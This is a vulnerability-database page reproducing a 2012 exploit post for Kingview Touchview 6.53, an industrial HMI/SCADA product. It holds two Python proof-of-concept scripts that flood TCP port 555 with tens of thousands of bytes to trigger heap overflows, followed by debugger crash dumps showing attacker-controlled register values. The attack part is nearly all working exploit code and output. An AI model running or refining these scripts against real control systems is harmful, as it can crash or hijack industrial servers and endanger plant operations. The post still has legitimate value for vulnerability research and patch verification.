Vulners
Lucene search
Kingview Touchview 6.53 Heap Overflows
🗓️ 25 Jun 2012 00:00:00Reported by Carlos Mario Penagos HollmannType 
packetstorm🔗 packetstormsecurity.com👁 25 Views
`# Exploit Title: Kingview 6.53 touchview.exe heap overflow 2
# Date: June 24 2012
# Exploit Author: Carlos Mario Penagos Hollmann
# Vendor Homepage: www.kingview.com
# Version: 6.53
# Tested on: Windows SP 1
# CVE :
Open kingivew click on Make choose network configuration--->network
parameter , then go to the node type and choose Local is a Login Server,
run the demo port 555 will be open.
NOTE:
This was already patched by the vendor silently.
import os
import socket
import sys
host ="10.0.2.15"
port = 555
exploit=("D"*70000)
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2.connect((host,port))
s2.send(exploit)
data = s2.recv(1024)
s2.close()
eax=42424242 ebx=00140000 ecx=0098ffff edx=00990000 esi=00140748
edi=00000004
eip=7c902a9d esp=0012f0b8 ebp=00140748 iopl=0 nv up ei pl nz na pe
nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
efl=00010206
ntdll!tan+0xcf:
7c902a9d 8b18 mov ebx,dword ptr [eax] ds:0023:42424242=?????
c902a8d 55 push ebp
7c902a8e 8be9 mov ebp,ecx
7c902a90 8b5504 mov edx,dword ptr [ebp+4]
7c902a93 8b4500 mov eax,dword ptr [ebp]
7c902a96 0bc0 or eax,eax
7c902a98 740c je ntdll!tan+0xd8 (7c902aa6)
7c902a9a 8d4aff lea ecx,[edx-1]
7c902a9d 8b18 mov ebx,dword ptr [eax]
ds:0023:42424242=????????
7c902a9f f00fc74d00 lock cmpxchg8b qword ptr [ebp]
7c902aa4 75f0 jne ntdll!tan+0xc8 (7c902a96)
7c902aa6 5d pop ebp
7c902aa7 5b pop ebx
7c902aa8 c3 ret
7c902aa9 8d4900 lea ecx,[ecx]
7c902aac 8f0424 pop dword ptr [esp]
7c902aaf 90 nop
7c902ab0 53 push ebx
7c902ab1 55 push ebp
###############################################################
# Exploit Title: Kingview Touchview EIP direct control
# Date: June 24 2012
# Exploit Author: Carlos Mario Penagos Hollmann
# Vendor Homepage: www.kingview.com
# Version: 6.53
# Tested on: Windows SP 1
# CVE :
Open kingivew click on Make choose network configuration--->network
parameter , then go to the node type and choose Local is a Login Server,
run the demo port 555 will be open.
NOTE:
This was already patched by the vendor silently.
import os
import socket
import sys
host ="10.0.2.15"
port = 555
exploit=("B"*80000)
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2.connect((host,port))
s2.send(exploit)
data = s2.recv(1024)
s2.close()
7c91b1ea 8b4610 mov eax,dword ptr [esi+10h]
7c91b1ed 3bc3 cmp eax,ebx
7c91b1ef 8945fc mov dword ptr [ebp-4],eax
7c91b1f2 0f849e000000 je ntdll!RtlpUnWaitCriticalSection+0x2f
(7c91b296)
7c91b1f8 8b06 mov eax,dword ptr [esi]
7c91b1fa ff4010 inc dword ptr [eax+10h]
ds:0023:42424252=????????
7c91b1fd 8b45fc mov eax,dword ptr [ebp-4]
7c91b200 83e001 and eax,1
7c91b203 8945e8 mov dword ptr [ebp-18h],eax
ntdll!RtlpWaitForCriticalSection+0x5b
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
25 Jun 2012 00:00Current
1.2Low risk
Vulners AI Score1.2